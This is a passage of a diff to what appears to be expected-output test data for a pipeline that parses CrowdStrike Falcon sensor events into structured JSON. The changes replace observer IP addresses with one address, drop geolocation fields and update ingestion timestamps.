"{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"208.70.175.112\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", + "ingested": "2021-12-09T13:36:11.150918200Z", + "original": "{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", "created": "2021-07-07T17:04:14.723Z", "kind": "event", "action": "ZipFileWritten", @@ -4876,24 +4287,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "6.24.13701.0" + "version": "6.24.13701.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:05.731Z", "file": { @@ -4905,14 +4304,14 @@ }, "related": { "hosts": [ - "208.180.129.90", + "67.43.156.14", "comp2" ], "hash": [ "3967242894" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "host": { @@ -4920,8 +4319,8 @@ "hostname": "comp2" }, "event": { - "ingested": "2021-11-22T09:23:55.465806700Z", - "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"208.180.129.90\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", + "ingested": "2021-12-09T13:36:11.150924500Z", + "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", "created": "2021-07-07T17:04:20.451Z", "kind": "state", "action": "AgentOnline", @@ -4986,21 +4385,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.153.49", - "vendor": "crowdstrike", - "ip": "208.93.153.49", "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:58.515Z", "file": { @@ -5015,18 +4405,18 @@ }, "related": { "hosts": [ - "208.93.153.49" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.93.153.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465813500Z", - "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"208.93.153.49\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", + "ingested": "2021-12-09T13:36:11.150930800Z", + "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", "created": "2021-07-07T17:03:58.553Z", "kind": "alert", "action": "CriticalFileAccessed", @@ -5056,24 +4446,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "6.24.13701.0" + "version": "6.24.13701.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:22.356Z", "os": { @@ -5085,18 +4463,18 @@ }, "related": { "hosts": [ - "208.180.129.90" + "67.43.156.14" ], "hash": [ "3967242894" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465820200Z", - "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"208.180.129.90\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150937Z", + "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0a3c21444f435459504520706c697374205055424c494320222d2f2f4170706c652f2f44544420504c49535420312e302f2f454e222022687474703a2f2f7777772e6170706c652e636f6d2f445444732f50726f70657274794c6973742d312e302e647464223e0a3c706c6973742076657273696f6e3d22312e30223e0a3c646963743e0a093c6b65793e50726f647563744275696c6456657273696f6e3c2f6b65793e0a093c737472696e673e3139483532343c2f737472696e673e0a093c6b65793e50726f64756374436f707972696768743c2f6b65793e0a093c737472696e673e313938332d32303231204170706c6520496e632e3c2f737472696e673e0a093c6b65793e50726f647563744e616d653c2f6b65793e0a093c737472696e673e4d6163204f5320583c2f737472696e673e0a093c6b65793e50726f647563745573657256697369626c6556657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e50726f6475637456657273696f6e3c2f6b65793e0a093c737472696e673e31302e31352e373c2f737472696e673e0a093c6b65793e694f53537570706f727456657273696f6e3c2f6b65793e0a093c737472696e673e31332e363c2f737472696e673e0a3c2f646963743e0a3c2f706c6973743e0a\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:22.356Z", "kind": "event", "action": "OsVersionInfo", @@ -5131,21 +4509,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.129.250", - "vendor": "crowdstrike", - "ip": "208.233.129.250", "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0010912.1" + "version": "1007.8.0010912.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:56.454Z", "os": { @@ -5156,18 +4525,18 @@ }, "related": { "hosts": [ - "208.233.129.250" + "67.43.156.14" ], "hash": [ "1284133626" ], "ip": [ - "208.233.129.250" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465826900Z", - "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"208.233.129.250\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150943400Z", + "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:56.454Z", "kind": "event", "action": "ConfigStateUpdate", @@ -5235,21 +4604,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:45.906Z", "file": { @@ -5261,18 +4621,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "1333055909" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465833700Z", - "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"208.203.151.21\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", + "ingested": "2021-12-09T13:36:11.150949700Z", + "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", "created": "2021-07-07T17:02:45.906Z", "kind": "event", "action": "LFODownloadConfirmation", @@ -5310,21 +4670,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.23.66.52", - "vendor": "crowdstrike", - "ip": "208.23.66.52", "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:33.633Z", "file": { @@ -5340,18 +4691,18 @@ }, "related": { "hosts": [ - "208.23.66.52" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.23.66.52" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465840400Z", - "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"208.23.66.52\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", + "ingested": "2021-12-09T13:36:11.150955900Z", + "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", "created": "2021-07-07T17:02:33.895Z", "kind": "event", "action": "TarFileWritten", @@ -5374,21 +4725,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.42.18.78", - "vendor": "crowdstrike", - "ip": "208.42.18.78", "serial_number": "ffffffff2977460db2898ece881a9358", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:30.466Z", "os": { @@ -5399,18 +4741,18 @@ }, "related": { "hosts": [ - "208.42.18.78" + "67.43.156.14" ], "hash": [ "3967242894" ], "ip": [ - "208.42.18.78" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465847Z", - "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"208.42.18.78\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150962300Z", + "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:30.466Z", "kind": "event", "action": "AgentConnect", @@ -5475,21 +4817,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.25.66.51", - "vendor": "crowdstrike", - "ip": "208.25.66.51", "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:25.235Z", "file": { @@ -5501,18 +4834,18 @@ }, "related": { "hosts": [ - "208.25.66.51" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.25.66.51" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465853700Z", - "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.25.66.51\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", + "ingested": "2021-12-09T13:36:11.150968600Z", + "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", "created": "2021-07-07T17:05:25.235Z", "kind": "event", "action": "LFODownloadConfirmation", @@ -5552,21 +4885,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.140.108.235", - "vendor": "crowdstrike", - "ip": "208.140.108.235", "serial_number": "fffffffff1a64286a233d09974b1b377", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:42.148Z", "file": { @@ -5580,18 +4904,18 @@ }, "related": { "hosts": [ - "208.140.108.235" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.140.108.235" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465860500Z", - "original": 